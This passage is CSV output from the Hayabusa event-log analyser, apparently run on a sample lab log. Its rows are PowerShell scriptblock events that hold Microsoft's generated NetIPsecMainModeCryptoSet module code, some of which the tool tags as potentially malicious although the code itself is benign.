[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] 
${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 
'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) 
{ $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeCryptoSet' -Alias '*' function 
Set-NetIPsecMainModeCryptoSe",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"rameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecMainModeCryptoSet' -Alias '*' function 
Get-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = 
$true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 
'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeCryptoSet' -Alias '*' function Set-NetIPsecMainModeCryptoSe",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"t { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] 
[OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxMinutes}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSessions}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, 
$script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxMinutes')) { [object]$__cmdletization_value = ${MaxMinutes} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = 